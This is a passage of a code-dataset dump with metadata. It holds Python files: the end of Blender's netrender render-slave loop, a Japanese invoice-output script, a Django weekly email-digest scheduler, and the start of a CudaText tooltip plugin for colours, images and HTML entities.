stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n RestoreErrorMode(val)\n elif job.type == netrender.model.JOB_PROCESS:\n command = job.frames[0].command\n val = SetErrorMode()\n process = subprocess.Popen(command.split(\" \"), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n RestoreErrorMode(val)\n\n headers = {\"slave-id\":slave_id}\n\n cancelled = False\n stdout = bytes()\n run_t = time.time()\n while not cancelled and process.poll() is None:\n stdout += process.stdout.read(1024)\n current_t = time.time()\n cancelled = engine.test_break()\n if current_t - run_t > CANCEL_POLL_SPEED:\n\n # update logs if needed\n if stdout:\n # (only need to update on one frame, they are linked\n conn.request(\"PUT\", logURL(job.id, first_frame), stdout, headers=headers)\n responseStatus(conn)\n \n # Also output on console\n if netsettings.use_slave_output_log:\n print(str(stdout, encoding='utf8'), end=\"\")\n\n stdout = bytes()\n\n run_t = current_t\n if testCancel(conn, job.id, first_frame):\n cancelled = True\n\n if job.type == netrender.model.JOB_BLENDER:\n netrender.repath.reset(job)\n\n # read leftovers if needed\n stdout += process.stdout.read()\n\n if cancelled:\n # kill process if needed\n if process.poll() is None:\n try:\n process.terminate()\n except OSError:\n pass\n continue # to next frame\n\n # flush the rest of the logs\n if stdout:\n # Also output on console\n if netsettings.use_slave_thumb:\n print(str(stdout, encoding='utf8'), end=\"\")\n \n # (only need to update on one frame, they are linked\n conn.request(\"PUT\", logURL(job.id, first_frame), stdout, headers=headers)\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n\n total_t = time.time() - start_t\n\n avg_t = total_t / len(job.frames)\n\n status = process.returncode\n\n print(\"status\", status)\n\n headers = {\"job-id\":job.id, \"slave-id\":slave_id, \"job-time\":str(avg_t)}\n\n\n if status == 0: # non zero status is error\n headers[\"job-result\"] = str(DONE)\n for frame in job.frames:\n headers[\"job-frame\"] = str(frame.number)\n if job.hasRenderResult():\n # send image back to server\n\n filename = os.path.join(JOB_PREFIX, \"%06d.exr\" % frame.number)\n\n # thumbnail first\n if netsettings.use_slave_thumb:\n thumbname = thumbnail.generate(filename)\n \n if thumbname:\n f = open(thumbname, 'rb')\n conn.request(\"PUT\", \"/thumb\", f, headers=headers)\n f.close()\n responseStatus(conn)\n\n f = open(filename, 'rb')\n conn.request(\"PUT\", \"/render\", f, headers=headers)\n f.close()\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n\n elif job.type == netrender.model.JOB_PROCESS:\n conn.request(\"PUT\", \"/render\", headers=headers)\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n else:\n headers[\"job-result\"] = str(ERROR)\n for frame in job.frames:\n headers[\"job-frame\"] = str(frame.number)\n # send error result back to server\n conn.request(\"PUT\", \"/render\", headers=headers)\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n\n engine.update_stats(\"\", \"Network render connected to master, waiting for jobs\")\n else:\n bisleep.sleep()\n\n conn.close()\n\n if netsettings.use_slave_clear:\n clearSlave(NODE_PREFIX)\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "damiles/blendocv", "sub_path": "release/scripts/addons/netrender/slave.py", "file_name": "slave.py", "file_ext": "py", "file_size_in_byte": 13914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "52", "api": [{"api_name": 
"sys.argv", "line_number": 31, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 41, "usage_type": "attribute"}, {"api_name": "platform.version", "line_number": 43, "usage_type": "call"}, {"api_name": "ctypes.windll.kernel32.SetErrorMode", "line_number": 46, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 46, "usage_type": "attribute"}, {"api_name": "ctypes.windll.kernel32.SetErrorMode", "line_number": 47, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 47, "usage_type": "attribute"}, {"api_name": "ctypes.windll.kernel32.SetErrorMode", "line_number": 51, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 51, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 60, "usage_type": "call"}, {"api_name": "platform.uname", "line_number": 63, "usage_type": "call"}, {"api_name": "netrender.utils.model.RenderSlave", "line_number": 64, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 64, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 64, "usage_type": "name"}, {"api_name": "http.client", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.renames", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 119, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 130, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 136, "usage_type": "call"}, {"api_name": "os.W_OK", "line_number": 136, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 166, "usage_type": "call"}, {"api_name": "http.client", "line_number": 174, "usage_type": "attribute"}, {"api_name": "netrender.utils.model.RenderJob.materialize", "line_number": 177, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 177, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 177, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 182, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 186, "usage_type": "attribute"}, 
{"api_name": "netrender.utils.model", "line_number": 189, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 189, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "netrender.utils.repath.update", "line_number": 201, "usage_type": "call"}, {"api_name": "netrender.utils.repath", "line_number": 201, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 201, "usage_type": "name"}, {"api_name": "netrender.utils.model", "line_number": 204, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 204, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "netrender.utils.model.LogFile", "line_number": 220, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 220, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 220, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 221, "usage_type": "call"}, {"api_name": "time.time", "line_number": 229, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path", "line_number": 239, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 239, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 239, "usage_type": "attribute"}, {"api_name": "netrender.utils.model", "line_number": 241, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 241, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 244, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 244, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 244, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 251, "usage_type": "call"}, {"api_name": "time.time", "line_number": 254, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 274, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 274, "usage_type": "name"}, {"api_name": "netrender.utils.repath.reset", "line_number": 275, "usage_type": "call"}, {"api_name": "netrender.utils.repath", "line_number": 275, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 275, "usage_type": "name"}, {"api_name": "http.client", "line_number": 297, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "netrender.thumbnail.generate", "line_number": 322, "usage_type": "call"}, {"api_name": "netrender.thumbnail", "line_number": 322, "usage_type": "name"}, {"api_name": "http.client", "line_number": 333, "usage_type": "attribute"}, {"api_name": "netrender.utils.model", "line_number": 336, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 336, "usage_type": "name"}, {"api_name": "http.client", "line_number": 338, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 346, 
"usage_type": "attribute"}]} +{"seq_id": "5036194987", "text": "def out_bill(data,column,billing_amount,shipping_fee,billdate,bill_info,customer_name,sum_total,sum_total_tax,sum_tax):\r\n import pandas\r\n from pandas import DataFrame\r\n import unicodedata\r\n from tabulate import tabulate\r\n import datetime\r\n import sys\r\n sys.path.append(\"/Users/User/Documents/seigo_final/customers/c_folder\")\r\n import yes_no\r\n\r\n \"\"\"\r\n tabulate.WIDE_CHARS_MODE = False\r\n \"\"\"\r\n\r\n print(\"\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n\r\n df = pandas.DataFrame(data=data, columns=column)\r\n result = tabulate(df, df.columns,tablefmt = \"github\",showindex=False)\r\n\r\n a = \"【明細書】\\n請求日:\"+billdate[0].strftime('%Y年%m月%d日')+\"\\n入金期限:\"+billdate[1].strftime('%Y年%m月%d日')\r\n line = \"\\n-----------------------------------------\\n\"\r\n b = \"【お客様情報】\\n名前:\"+bill_info[0]+\"\\n郵便番号:\"+bill_info[1]+\"\\n住所:\"+bill_info[2]+\"\\n電話番号:\"+bill_info[3]+\"\\nメールアドレス:\"+bill_info[4]\r\n c = \"【明細情報】\\n\\n\\n\" + result\r\n d = \"\\n\\n配送料:\" + str(shipping_fee)\r\n g = \"\\n税抜合計額:\" + str(sum_total) +\"円\"\r\n h = \"\\n税額合計:\" + str(sum_tax) + \"円\"\r\n e = \"\\n税込合計額:\" + str(billing_amount) +\"円\"\r\n\r\n i = \"【お問い合わせ先】\\n\"\r\n k = \"住所:東京都赤坂2-14-32 赤坂2・14プラザビル 4階\"\r\n l = \"\\n電話番号:03-3560-4061\"\r\n m = \"\\nメールアドレス:atsushi.kato@ctp.co.jp\"\r\n n = \"\\nご利用ありがとうございました。\"\r\n\r\n z = a + line + b + line + c + d + g + h + e + line + i + k + l + m + n\r\n\r\n print(z)\r\n print(\"\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n上記の明細書を出力してもよろしいですか:\")\r\n num = yes_no.yes_no_only()\r\n if num == 1:\r\n now = datetime.datetime.now()\r\n filename = customer_name + \"_\" + now.strftime('%Y%m%d_%H%M%S') + '.txt'\r\n f = open(\"C:\\\\Users\\\\User\\\\Documents\\\\seigo_final\\\\VVstore\\\\output\\\\for_picking\\\\\"+filename, 'w')\r\n f.write(z)\r\n f.close()\r\n print(filename + \"が出力されました\")\r\n else:\r\n print(\"\\n出力がキャンセルされました\\n\\n\")\r\n", "repo_name": "tokazaki13/seigo_final_taishi", "sub_path": "VVstore/VV_folder/out_for_deliver.py", "file_name": "out_for_deliver.py", "file_ext": "py", "file_size_in_byte": 2316, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 17, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 18, "usage_type": "call"}, {"api_name": "yes_no.yes_no_only", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "42887567150", "text": "import logging\nimport requests\nimport lxml.html\n\n\nfrom django.conf import settings\nfrom datetime import datetime\nfrom Lib.datetime import timedelta\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.mail import send_mail\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\n\n\n\nfrom ...models import Category\n\nlogger = logging.getLogger(__name__)\n\n\ndef send_email():\n message = ''\n categories = Category.objects.all()\n for category in categories:\n posts_cat = category.posts.all()\n print(posts_cat)\n post_filter = 
posts_cat.filter(post_date_time__gt=datetime.now() - timedelta(days=7))\n        print(post_filter)\n        for post in post_filter:\n            post_url = f'http://127.0.0.1:8000/{post.pk}'\n            message += f'{post.post_title} \\n {post.post_text[:50]}...\\n Follow link: {post_url}\\n'\n            categories = post.post_category.all()\n            cat_id = 0\n            for c in categories:\n                cat_id = c.id\n                print(cat_id)\n\n            get_subscribers = Category.objects.get(id=cat_id)\n            subs_list = get_subscribers.subscribers.all()\n            print(subs_list)\n            for sub in subs_list:\n                send_to = sub.email\n                send_to_uname = sub.username\n                send_mail(\n                    subject=f'Dear {send_to_uname}! Please, get the latest news!',\n                    message=message,\n                    from_email='zhuparadamova@yandex.ru',\n                    recipient_list=[send_to]\n                )\n\n\n\n# function that will delete job executions that are no longer relevant\ndef delete_old_job_executions(max_age=604_800):\n    \"\"\"This job deletes all apscheduler job executions older than `max_age` from the database.\"\"\"\n    DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n    help = \"Runs apscheduler.\"\n\n    def handle(self, *args, **options):\n        scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n        scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n        # add the job to our scheduler\n\n        scheduler.add_job(\n            send_email,\n            trigger=CronTrigger(second=\"*/604_800\"),\n            # Same as an interval, but specifying the trigger this way is clearer to django\n            id=\"send_email\", # unique id\n            max_instances=1,\n            replace_existing=True,\n        )\n        logger.info(\n            \"Added weekly job: 'send_email'.\"\n        )\n\n        scheduler.add_job(\n            delete_old_job_executions,\n            trigger=CronTrigger(\n                day_of_week=\"mon\", hour=\"00\", minute=\"00\"\n            ),\n            # Every week, old jobs that either failed or no longer need to run will be deleted.\n            id=\"delete_old_job_executions\",\n            max_instances=1,\n            replace_existing=True,\n        )\n\n        logger.info(\n            \"Added weekly job: 'delete_old_job_executions'.\"\n        )\n\n        try:\n            logger.info(\"Starting scheduler...\")\n            scheduler.start()\n        except KeyboardInterrupt:\n            logger.info(\"Stopping scheduler...\")\n            scheduler.shutdown()\n            logger.info(\"Scheduler shut down successfully!\")", "repo_name": "Zhupar/NewsPaper", "sub_path": "NewsPaper/news/management/commands/runapscheduler.py", "file_name": "runapscheduler.py", "file_ext": "py", "file_size_in_byte": 3722, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Category.objects.all", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "Lib.datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Category.objects.get", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 41, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 47, "usage_type": "call"}, {"api_name": "django_apscheduler.models.DjangoJobExecution.objects.delete_old_job_executions", "line_number": 59, "usage_type": "call"}, {"api_name": 
"django_apscheduler.models.DjangoJobExecution.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "django_apscheduler.models.DjangoJobExecution", "line_number": 59, "usage_type": "name"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 62, "usage_type": "name"}, {"api_name": "apscheduler.schedulers.blocking.BlockingScheduler", "line_number": 66, "usage_type": "call"}, {"api_name": "django.conf.settings.TIME_ZONE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 66, "usage_type": "name"}, {"api_name": "django_apscheduler.jobstores.DjangoJobStore", "line_number": 67, "usage_type": "call"}, {"api_name": "apscheduler.triggers.cron.CronTrigger", "line_number": 73, "usage_type": "call"}, {"api_name": "apscheduler.triggers.cron.CronTrigger", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "28761922362", "text": "import re\nimport json\nimport os\nimport html\nfrom cudatext import *\nfrom .colorcodes import *\n\nfn_ini = os.path.join(app_path(APP_DIR_SETTINGS), 'cuda_html_tooltips.ini')\nMY_TAG = 101 #uniq value for all plugins with ed.hotspots()\n\nLEXERS_CSS = 'CSS,SCSS,Sass,LESS'\nREGEX_COLORS = r'(\\#[0-9a-f]{3}\\b)|(\\#[0-9a-f]{6}\\b)'\nREGEX_RGB = r'\\brgba?\\(\\s*(\\d+%?)\\s*[,\\s]\\s*(\\d+%?)\\s*[,\\s]\\s*(\\d+%?)\\s*([,\\s/]\\s*[\\d\\.%?]+\\s*)?\\)'\nREGEX_PIC = r'(\\'|\")[^\\'\"]+?\\.(png|gif|jpg|jpeg|bmp|ico)\\1'\nREGEX_PIC_CSS = r'\\([^\\'\"\\(\\)]+?\\.(png|gif|jpg|jpeg|bmp|ico)\\)'\nREGEX_ENT = r'&\\#?\\w+;'\n\nre_colors_compiled = re.compile(REGEX_COLORS, re.I)\nre_rgb_compiled = re.compile(REGEX_RGB, re.I)\nre_pic_compiled = re.compile(REGEX_PIC, re.I)\nre_pic_css_compiled = re.compile(REGEX_PIC_CSS, re.I)\nre_ent_compiled = re.compile(REGEX_ENT, 0)\n\nFORM_COLOR_W = 170\nFORM_COLOR_H = 25\nFORM_PIC_W_MAX = 270\nFORM_PIC_W_MIN = 50\nFORM_PIC_H_MAX = 220\nFORM_PIC_H_MIN = 50\nFORM_ENT_W = 50\nFORM_ENT_H = 50\nFORM_ENT_FONT_SIZE = 28\nFORM_GAP = 4\nFORM_GAP_OUT = 0\nFORM_GAP_OUT_COLOR = 0 #-1\nFORM_COLOR_KEEP = False\nCOLOR_FORM_BACK = 0x505050\nCOLOR_FORM_FONT = 0xE0E0E0\nCOLOR_FORM_FONT2 = 0x40E0E0\nCOLOR_FORM_PANEL_BORDER = 0xFFFFFF\nMAX_LINES = 5000\n\ndef str2color(s):\n perc = s.endswith('%')\n if perc:\n s = s[:-1]\n n = int(s)\n if perc:\n n = n*255//100\n return n\n\n\nclass Command:\n\n def __init__(self):\n\n self.load_config()\n self.init_form_color()\n self.init_form_pic()\n self.init_form_ent()\n\n def on_change_slow(self, ed_self):\n\n self.find_hotspots(ed_self)\n\n def on_open(self, ed_self):\n\n self.find_hotspots(ed_self)\n\n def find_hotspots(self, ed):\n\n ed.hotspots(HOTSPOT_DELETE_BY_TAG, tag=MY_TAG)\n count = 0\n use_count = min(ed.get_line_count(), MAX_LINES)\n\n for nline in range(use_count):\n line = ed.get_text_line(nline)\n\n #find entities\n for item in re_ent_compiled.finditer(line):\n span = item.span()\n data = json.dumps({\n 'ent': item.group(0),\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #find colors\n for item in re_colors_compiled.finditer(line):\n span = item.span()\n data = json.dumps({\n 'color': item.group(0),\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #find rgb\n for item in re_rgb_compiled.finditer(line):\n span = item.span()\n data = json.dumps({\n 'rgb': item.group(0),\n 'r': str2color(item.group(1)),\n 'g': 
str2color(item.group(2)),\n 'b': str2color(item.group(3)),\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #find pics, only for named files\n if ed.get_filename():\n for item in re_pic_compiled.finditer(line):\n span = item.span()\n text = item.group(0)[1:-1]\n if 'http://' in text: continue\n if 'https://' in text: continue\n\n data = json.dumps({\n 'pic': text,\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #same for CSS lexers\n lexer = ed.get_prop(PROP_LEXER_FILE)\n if ed.get_filename() and (','+lexer+',' in ','+LEXERS_CSS+','):\n for item in re_pic_css_compiled.finditer(line):\n span = item.span()\n text = item.group(0)[1:-1]\n if 'http://' in text: continue\n if 'https://' in text: continue\n\n data = json.dumps({\n 'pic': text,\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #print('HTML Tooltips: %d items'%count)\n\n\n def dlgcolor_mouse_exit(self, id_dlg, id_ctl, data='', info=''):\n\n if not self.is_mouse_in_form(id_dlg):\n dlg_proc(id_dlg, DLG_HIDE)\n\n\n def on_hotspot(self, ed_self, entered, hotspot_index):\n\n if not entered:\n allow = FORM_COLOR_KEEP and self.is_mouse_in_form(self.h_dlg_color)\n if allow: return\n self.hide_forms()\n\n else:\n self.hide_forms()\n hotspot = ed_self.hotspots(HOTSPOT_GET_LIST)[hotspot_index]\n if hotspot['tag'] != MY_TAG: return\n\n data = json.loads(hotspot['tag_str'])\n text = data.get('color', '')\n if text:\n self.update_form_color(text)\n h_dlg = self.h_dlg_color\n else:\n text = data.get('pic', '')\n if text:\n if not self.update_form_pic(ed_self, text): return\n h_dlg = self.h_dlg_pic\n else:\n text = data.get('ent', '')\n if text:\n if not self.update_form_ent(text): return\n h_dlg = self.h_dlg_ent\n else:\n text = data.get('rgb', '')\n if text:\n self.update_form_rgb(text, data['r'], data['g'], data['b'])\n h_dlg = self.h_dlg_color\n else:\n return\n\n prop = dlg_proc(h_dlg, DLG_PROP_GET)\n form_w = prop['w']\n form_h = prop['h']\n\n pos_x = data['x']\n pos_y = data['y']\n pos = ed_self.convert(CONVERT_CARET_TO_PIXELS, x=pos_x, y=pos_y)\n\n gap_out = FORM_GAP_OUT_COLOR if h_dlg==self.h_dlg_color else FORM_GAP_OUT\n cell_size = ed_self.get_prop(PROP_CELL_SIZE)\n ed_coord = ed_self.get_prop(PROP_COORDS)\n ed_size_x = ed_coord[2]-ed_coord[0]\n ed_size_y = ed_coord[3]-ed_coord[1]\n hint_x = pos[0]\n hint_y = pos[1] + cell_size[1] + gap_out\n\n #no space on bottom?\n if hint_y + form_h > ed_size_y:\n hint_y = pos[1] - form_h - gap_out\n\n #no space on right?\n if hint_x + form_w > ed_size_x:\n hint_x = ed_size_x - form_w\n\n dlg_proc(h_dlg, DLG_PROP_SET, prop={\n 'p': ed_self.h, #set parent to Editor handle\n 'x': hint_x,\n 'y': hint_y,\n })\n dlg_proc(h_dlg, DLG_SHOW_NONMODAL)\n if h_dlg==self.h_dlg_color:\n self.update_form_color_size()\n\n\n def hide_forms(self):\n\n dlg_proc(self.h_dlg_color, DLG_HIDE)\n dlg_proc(self.h_dlg_pic, DLG_HIDE)\n dlg_proc(self.h_dlg_ent, DLG_HIDE)\n\n\n def init_form_color(self):\n\n h = dlg_proc(0, DLG_CREATE)\n self.h_dlg_color = h\n\n dlg_proc(h, DLG_PROP_SET, prop={\n 'w': FORM_COLOR_W+2*FORM_GAP,\n 'border': False,\n 'color': COLOR_FORM_BACK,\n 'on_mouse_exit': self.dlgcolor_mouse_exit,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'colorpanel')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 
'name': 'panel_color',\n 'align': ALIGN_TOP,\n 'sp_a': FORM_GAP,\n 'h': FORM_COLOR_H,\n 'ex0': 1,\n 'ex1': 0x808080,\n 'ex2': 0x202020,\n 'ex3': COLOR_FORM_PANEL_BORDER,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_text',\n 'cap': '?',\n 'font_color': COLOR_FORM_FONT2,\n 'align': ALIGN_TOP,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'y': 200,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_rgb',\n 'cap': '??',\n 'font_color': COLOR_FORM_FONT,\n 'align': ALIGN_TOP,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'y': 220,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_hls',\n 'cap': '??',\n 'font_color': COLOR_FORM_FONT,\n 'align': ALIGN_TOP,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'y': 240,\n })\n\n\n def init_form_pic(self):\n\n h = dlg_proc(0, DLG_CREATE)\n self.h_dlg_pic = h\n\n dlg_proc(h, DLG_PROP_SET, prop={\n 'w': FORM_PIC_W_MAX,\n 'h': FORM_PIC_H_MAX,\n 'border': False,\n 'color': COLOR_FORM_BACK,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_text',\n 'cap': '??',\n 'font_color': COLOR_FORM_FONT,\n 'align': ALIGN_TOP,\n 'sp_a': FORM_GAP,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'image')\n self.h_img = dlg_proc(h, DLG_CTL_HANDLE, index=n)\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'img',\n 'align': ALIGN_CLIENT,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'ex0': True, #center\n 'ex1': True, #stretch\n 'ex2': True, #stretch in\n 'ex3': False, #stretch out\n 'ex4': True, #keep origin x\n 'ex5': True, #keep origin y\n })\n\n\n def init_form_ent(self):\n\n h = dlg_proc(0, DLG_CREATE)\n self.h_dlg_ent = h\n\n dlg_proc(h, DLG_PROP_SET, prop={\n 'w': FORM_ENT_W,\n 'h': FORM_ENT_H,\n 'border': False,\n 'color': COLOR_FORM_BACK,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'colorpanel')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_text',\n 'cap': '??',\n 'color': COLOR_FORM_BACK,\n 'font_color': COLOR_FORM_FONT,\n 'font_size': FORM_ENT_FONT_SIZE,\n 'align': ALIGN_CLIENT,\n })\n\n\n def update_form_color(self, text):\n\n ncolor = HTMLColorToPILColor(text)\n r, g, b = HTMLColorToRGB(text)\n self.update_form_color_ex(text, ncolor, r, g, b)\n\n def update_form_rgb(self, text, r, g, b):\n\n ncolor = RGBToPILColor((r, g, b))\n self.update_form_color_ex(text, ncolor, r, g, b)\n\n def update_form_color_size(self):\n\n h_dlg = self.h_dlg_color\n prop = dlg_proc(h_dlg, DLG_CTL_PROP_GET, name='label_hls')\n need_size = prop['y']+prop['h']+FORM_GAP\n dlg_proc(h_dlg, DLG_PROP_SET, prop={'h': need_size})\n\n def update_form_color_ex(self, text, ncolor, r, g, b):\n\n h_dlg = self.h_dlg_color\n\n #let's get HSL like here https://www.rapidtables.com/convert/color/rgb-to-hsl.html\n h, l, s = RGBToHLS(r, g, b)\n h = float_to_degrees(h)\n l = float_to_percent(l)\n s = float_to_percent(s)\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='panel_color', prop={\n 'color': ncolor,\n })\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='label_text', prop={\n 'cap': text,\n })\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='label_rgb', prop={\n 'cap': 'rgb(%d, %d, %d)' % (r, g, b),\n })\n\n dlg_proc(h_dlg, DLG_CTL_PROP_SET, name='label_hls', prop={\n 'cap': 'hsl(%s, %s, %s)' % (h, s, l),\n })\n\n\n def update_form_pic(self, ed, text):\n\n fn = self.get_pic_filename(ed, text)\n if 
